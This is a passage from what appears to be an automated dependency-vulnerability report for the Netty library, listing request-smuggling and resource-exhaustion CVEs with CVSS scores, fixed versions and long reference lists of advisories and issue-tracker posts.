CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20444 OSSIndex - https://github.com/netty/netty/issues/9866 REDHAT - RHSA-2020:0497 REDHAT - RHSA-2020:0567 REDHAT - RHSA-2020:0601 REDHAT - RHSA-2020:0605 REDHAT - RHSA-2020:0606 REDHAT - RHSA-2020:0804 REDHAT - RHSA-2020:0805 REDHAT - RHSA-2020:0806 REDHAT - RHSA-2020:0811 UBUNTU - USN-4532-1 Vulnerable Software & Versions: (show all )
CVE-2019-20445 suppress
HttpObjectDecoder.java in Netty before 4.1.44 allows a Content-Length header to be accompanied by a second Content-Length header, or by a Transfer-Encoding header. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (6.4) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:N CVSSv3:
Base Score: CRITICAL (9.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N References:
- FEDORA-2020-66b5f85ccc - [bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image - [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities - [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6 - [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] gianm merged pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [druid-commits] 20200131 [GitHub] [druid] zachjsh opened a new pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flume-issues] 20200410 [jira] [Created] (FLUME-3363) CVE-2019-20445 - [flume-issues] 20200415 [jira] [Updated] (FLUME-3363) CVE-2019-20445 - [flume-issues] 20200422 [jira] [Commented] (FLUME-3363) CVE-2019-20445 - [geode-dev] 20200408 Proposal to bring GEODE-7969 to support/1.12 - [geode-dev] 20200408 Re: Proposal to bring GEODE-7969 to support/1.12 - [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list - [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [spark-issues] 20200309 [jira] [Created] (SPARK-31095) Upgrade netty version to fix security vulnerabilities - [spark-issues] 20210824 [jira] [Created] (SPARK-36572) Upgrade version of io.netty to 4.1.44.Final to solve CVE-2019-20444 and CVE-2019-20445 - [spark-reviews] 20200310 [GitHub] [spark] dongjoon-hyun commented on issue #27870: [SPARK-31095][BUILD][2.4] Upgrade netty-all to 4.1.47.Final - [zookeeper-dev] 20200203 Re: [VOTE] Apache ZooKeeper release 3.6.0 candidate 1 - [zookeeper-dev] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Assigned] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Created] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200203 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200204 [jira] [Resolved] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Commented] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - [zookeeper-issues] 20200209 [jira] [Updated] (ZOOKEEPER-3716) upgrade netty 4.1.42 to address CVE-2019-20444 CVE-2019-20445 - https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E - https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E DEBIAN - DSA-4885 MISC - https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final MISC - https://github.com/netty/netty/issues/9861 MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2109-1] netty security update MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2364-1] netty security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update OSSINDEX - [CVE-2019-20445] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-20445 OSSIndex - https://github.com/netty/netty/issues/9861 OSSIndex - https://github.com/netty/netty/pull/9865 OSSIndex - https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E REDHAT - RHSA-2020:0497 REDHAT - RHSA-2020:0567 REDHAT - RHSA-2020:0601 REDHAT - RHSA-2020:0605 REDHAT - RHSA-2020:0606 REDHAT - RHSA-2020:0804 REDHAT - RHSA-2020:0805 REDHAT - RHSA-2020:0806 REDHAT - RHSA-2020:0811 UBUNTU - USN-4532-1 Vulnerable Software & Versions: (show all )
CVE-2019-16869 suppress
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N References:
- [camel-commits] 20201120 [camel] branch camel-2.25.x updated: Updating Netty to 4.1.48.Final to fix some CVEs (e.g. CVE-2019-16869, CVE-2019-20444) - [cassandra-commits] 20191113 [jira] [Created] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 - [cassandra-commits] 20191113 [jira] [Created] (CASSANDRA-15418) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 for Cassendra 2.2.5 - [cassandra-commits] 20200218 [jira] [Created] (CASSANDRA-15590) Upgrade io.netty_netty-all dependency to fix security vulnerabilities - [cassandra-commits] 20200604 [jira] [Created] (CASSANDRA-15856) Security vulnerabilities with dependency jars of Cassandra 3.11.6 - [cassandra-commits] 20210526 [jira] [Created] (CASSANDRA-16699) Security vulnerability CVE-2020-7238 for Netty - [cassandra-commits] 20210526 [jira] [Updated] (CASSANDRA-16699) Security vulnerability CVE-2020-7238 for Netty - [cassandra-commits] 20210924 [jira] [Commented] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 - [cassandra-commits] 20210924 [jira] [Updated] (CASSANDRA-15417) CVE-2019-16869(Netty is vulnerable to HTTP Request Smuggling) of severity 7.5 - [drill-dev] 20191017 Dependencies used by Drill contain known vulnerabilities - [drill-dev] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities - [drill-issues] 20191021 [jira] [Created] (DRILL-7416) Updates required to dependencies to resolve potential security vulnerabilities - [druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities - [druid-commits] 20200131 [GitHub] [druid] ccaominh commented on a change in pull request #9300: Fix / suppress netty CVEs CVE-2019-20445 and CVE-2019-20444 - [flink-dev] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [flink-issues] 20200910 [jira] [Created] (FLINK-19195) question on security vulnerabilities in flink - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.1 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch branch-3.2 updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-commits] 20200309 [hadoop] branch trunk updated: HADOOP-16871. Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Assigned] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444, - [hadoop-common-issues] 20200219 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200224 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200225 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200309 [jira] [Updated] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [hadoop-common-issues] 20200310 [jira] [Commented] (HADOOP-16871) Upgrade Netty version to 4.1.45.Final to handle CVE-2019-20444,CVE-2019-16869 - [olingo-dev] 20191206 [jira] [Assigned] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Created] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Resolved] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191206 [jira] [Updated] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191209 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [olingo-dev] 20191227 [jira] [Commented] (OLINGO-1414) Dependency check fails on 4.7.0 : CVE-2019-16869 on Netty - [pulsar-commits] 20201215 [GitHub] [pulsar] yanshuchong opened a new issue #8967: CVSS issue list - [pulsar-commits] 20210120 [GitHub] [pulsar] fmiguelez opened a new issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210121 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [pulsar-commits] 20210122 [GitHub] [pulsar] hpvd commented on issue #9249: Upgrade Netty dependency in broker to solve vulnerabilities: CVE-2019-16869, CVE-2020-11612, CVE-2019-20445, CVE-2019-20444 - [rocketmq-dev] 20201224 [GitHub] [rocketmq] codecov-io commented on pull request #2517: fix CVE-2019-16869, CVE-2018-8020 - [rocketmq-dev] 20201224 [GitHub] [rocketmq] coveralls commented on pull request #2517: fix CVE-2019-16869, CVE-2018-8020 - [rocketmq-dev] 20201224 [GitHub] [rocketmq] crazywen opened a new pull request #2517: fix CVE-2019-16869, CVE-2018-8020 - [spark-issues] 20191219 [jira] [Commented] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191219 [jira] [Created] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191219 [jira] [Updated] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Comment Edited] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Commented] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Issue Comment Deleted] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Reopened] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [spark-issues] 20191220 [jira] [Resolved] (SPARK-30308) Update Netty and Netty-all to address CVE-2019-16869 - [tinkerpop-commits] 20191022 [tinkerpop] branch tp34 updated: Bump to Netty 4.1.42 fixes CVE-2019-16869 - CTR - [zookeeper-commits] 20191003 [zookeeper] branch branch-3.5 updated: ZOOKEEPER-3563: Update Netty to fix CVE-2019-16869 - [zookeeper-commits] 20191003 [zookeeper] branch branch-3.5.6 updated: ZOOKEEPER-3563: Update Netty to fix CVE-2019-16869 - [zookeeper-commits] 20191003 [zookeeper] branch master updated: ZOOKEEPER-3563: Update Netty to address CVE-2019-16869 - [zookeeper-dev] 20190930 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2 - [zookeeper-dev] 20190930 [jira] [Created] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty-3.10.6.Final.jar: CVE-2019-16869 - [zookeeper-dev] 20191001 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2 - [zookeeper-dev] 20191002 Re: [VOTE] Apache ZooKeeper release 3.5.6 candidate 2 - [zookeeper-issues] 20190930 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20190930 [jira] [Created] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty-3.10.6.Final.jar: CVE-2019-16869 - [zookeeper-issues] 20190930 [jira] [Updated] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20190930 [jira] [Updated] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - netty with CVE-2019-16869 - [zookeeper-issues] 20191001 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20191003 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20191008 [jira] [Commented] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty - [zookeeper-issues] 20191008 [jira] [Resolved] (ZOOKEEPER-3563) dependency check failing on 3.4 and 3.5 branches - CVE-2019-16869 on Netty BUGTRAQ - 20200105 [SECURITY] [DSA 4597-1] netty security update DEBIAN - DSA-4597 MISC - https://github.com/netty/netty/compare/netty-4.1.41.Final...netty-4.1.42.Final MISC - https://github.com/netty/netty/issues/9571 MLIST - [debian-lts-announce] 20190930 [SECURITY] [DLA 1941-1] netty security update MLIST - [debian-lts-announce] 20200219 [SECURITY] [DLA 2110-1] netty-3.9 security update MLIST - [debian-lts-announce] 20200904 [SECURITY] [DLA 2365-1] netty-3.9 security update OSSINDEX - [CVE-2019-16869] CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16869 OSSIndex - https://github.com/netty/netty/issues/9571 REDHAT - RHSA-2019:3892 REDHAT - RHSA-2019:3901 REDHAT - RHSA-2020:0159 REDHAT - RHSA-2020:0160 REDHAT - RHSA-2020:0161 REDHAT - RHSA-2020:0164 REDHAT - RHSA-2020:0445 UBUNTU - USN-4532-1 Vulnerable Software & Versions: (show all )
CVE-2020-11612 suppress
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free memory to a single decoder. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-37136 suppress
The Bzip2 decompression decoder function doesn't allow setting size restrictions on the decompressed output data (which affects the allocation size used during decompression). All users of Bzip2Decoder are affected. The malicious input can trigger an OOME and so a DoS attack CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-37137 suppress
The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input that decompresses to a very big size (via a network stream or a file) or by sending a huge skippable chunk. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-41881 suppress
Netty project is an event-driven asynchronous network application framework. In versions prior to 4.1.86.Final, a StackOverflowError can be raised when parsing a malformed crafted message due to an infinite recursion. This issue is patched in version 4.1.86.Final. There is no workaround, except using a custom HaProxyMessageDecoder. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2023-44487 suppress
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-43797 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. Netty prior to version 4.1.71.Final skips control chars when they are present at the beginning / end of the header name. It should instead fail fast as these are not allowed by the spec and could lead to HTTP request smuggling. Failing to do the validation might cause netty to "sanitize" header names before it forward these to another remote system when used as proxy. This remote system can't see the invalid usage anymore, and therefore does not do the validation itself. Users should upgrade to version 4.1.71.Final. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-41915 (OSSINDEX) suppress
Netty project is an event-driven asynchronous network application framework. Starting in version 4.1.83.Final and prior to 4.1.86.Final, when calling `DefaultHttpHeadesr.set` with an _iterator_ of values, header value validation was not performed, allowing malicious header values in the iterator to perform HTTP Response Splitting. This issue has been patched in version 4.1.86.Final. Integrators can work around the issue by changing the `DefaultHttpHeaders.set(CharSequence, Iterator<?>)` call, into a `remove()` call, and call `add()` in a loop over the iterator of values.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2022-41915 for details CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:/C:L/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:io.netty:netty-codec:4.1.38.Final:*:*:*:*:*:*:* CVE-2023-34462 suppress
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`. This vulnerability has been fixed in version 4.1.94.Final. CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2021-21295 suppress
Netty is an open-source, asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. In Netty (io.netty:netty-codec-http2) before version 4.1.60.Final there is a vulnerability that enables request smuggling. If a Content-Length header is present in the original HTTP/2 request, the field is not validated by `Http2MultiplexHandler` as it is propagated up. This is fine as long as the request is not proxied through as HTTP/1.1. If the request comes in as an HTTP/2 stream, gets converted into the HTTP/1.1 domain objects (`HttpRequest`, `HttpContent`, etc.) via `Http2StreamFrameToHttpObjectCodec `and then sent up to the child channel's pipeline and proxied through a remote peer as HTTP/1.1 this may result in request smuggling. In a proxy case, users may assume the content-length is validated somehow, which is not the case. If the request is forwarded to a backend channel that is a HTTP/1.1 connection, the Content-Length now has meaning and needs to be checked. An attacker can smuggle requests inside the body as it gets downgraded from HTTP/2 to HTTP/1.1. For an example attack refer to the linked GitHub Advisory. Users are only affected if all of this is true: `HTTP2MultiplexCodec` or `Http2FrameCodec` is used, `Http2StreamFrameToHttpObjectCodec` is used to convert to HTTP/1.1 objects, and these HTTP/1.1 objects are forwarded to another remote peer. This has been patched in 4.1.60.Final As a workaround, the user can do the validation by themselves by implementing a custom `ChannelInboundHandler` that is put in the `ChannelPipeline` behind `Http2StreamFrameToHttpObjectCodec`. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling')
CVSSv2:
Base Score: LOW (2.6) Vector: /AV:N/AC:H/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N References:
- [bookkeeper-issues] 20210330 [GitHub] [bookkeeper] eolivelli opened a new issue #2669: Update Netty to 4.1.60.final - [flink-dev] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210424 [jira] [Created] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210426 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210511 [jira] [Commented] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210610 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [flink-issues] 20210618 [jira] [Updated] (FLINK-22441) In Flink v1.11.3 contains netty(version:3.10.6) netty(version:4.1.60) . There are many vulnerabilities, like CVE-2021-21409 etc. please confirm these version and fix. thx - [hbase-commits] 20210402 [hbase-thirdparty] branch master updated: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 (#48) - [hbase-dev] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] Apache-HBase commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] HorizonNet commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell commented on pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell merged pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [GitHub] [hbase-thirdparty] apurtell opened a new pull request #48: HBASE-25728 [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Assigned] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Created] (HBASE-25728) [hbase-thirdparty] ZOOKEEPER-4272: Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to > 4.1.60 due to security vulnerability CVE-2021-21295 - [hbase-issues] 20210402 [jira] [Updated] (HBASE-25728) [hbase-thirdparty] Upgrade Netty library to >= 4.1.60 due to security vulnerability CVE-2021-21295 - [jackrabbit-dev] 20210709 [GitHub] [jackrabbit-oak] blackat opened a new pull request #321: Update netty to resolve CVE-2021-21295 and BDSA-2018-4022 - [kafka-dev] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-dev] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Created] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210330 [jira] [Updated] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr commented on pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210331 [GitHub] [kafka] dongjinleekr opened a new pull request #10448: KAFKA-12583: Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Commented] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210401 [jira] [Resolved] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kafka-jira] 20210402 [jira] [Assigned] (KAFKA-12583) Upgrade of netty-codec due to CVE-2021-21295 - [kudu-issues] 20210904 [jira] [Created] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210904 [jira] [Updated] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Commented] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Resolved] (KUDU-3313) There is a CVE-2021-21409 vulnerability in netty version 4.1.60 - [kudu-issues] 20210907 [jira] [Updated] (KUDU-3313) There is a 